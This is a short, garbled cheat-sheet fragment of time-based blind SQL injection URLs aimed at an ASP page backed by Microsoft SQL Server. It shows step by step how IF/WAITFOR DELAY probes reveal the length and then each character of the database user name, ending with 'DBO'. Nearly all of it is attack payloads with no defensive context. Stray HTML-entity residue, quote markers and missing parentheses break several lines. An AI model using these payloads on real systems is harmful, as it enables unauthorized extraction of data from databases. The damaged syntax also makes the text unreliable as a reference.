####################################################***nbsp;
Blind SQL Injection Syntax for extracting the USER 

Total Characters 
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- 
> (+10 seconds

1st Character 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) 
WAITFOR DELAY '00:00:10'-- (+10 seconds
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) 
WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) 
WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),1,1)))=100WAITFOR DELAY '00:00:10'-- 
> (+
10 seconds

2nd Character 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) 
WAITFOR DELAY '00:00:10'-- (+10 seconds
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) 
WAITFOR DELAY '00:00:10'-- (+10 seconds

3rd Character 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) 
WAITFOR DELAY '00:00:10'-- (+10 seconds
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))>115WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))>105WAITFOR DELAY '00:00:10'-- 
> (+
10 seconds
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))>110WAITFOR DELAY '00:00:10'-- 
> (+
10 seconds
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))=109WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))=110WAITFOR DELAY '00:00:10'-- 
> (+
10 seconds

Database User DBO 



***91;/
LEFT***93;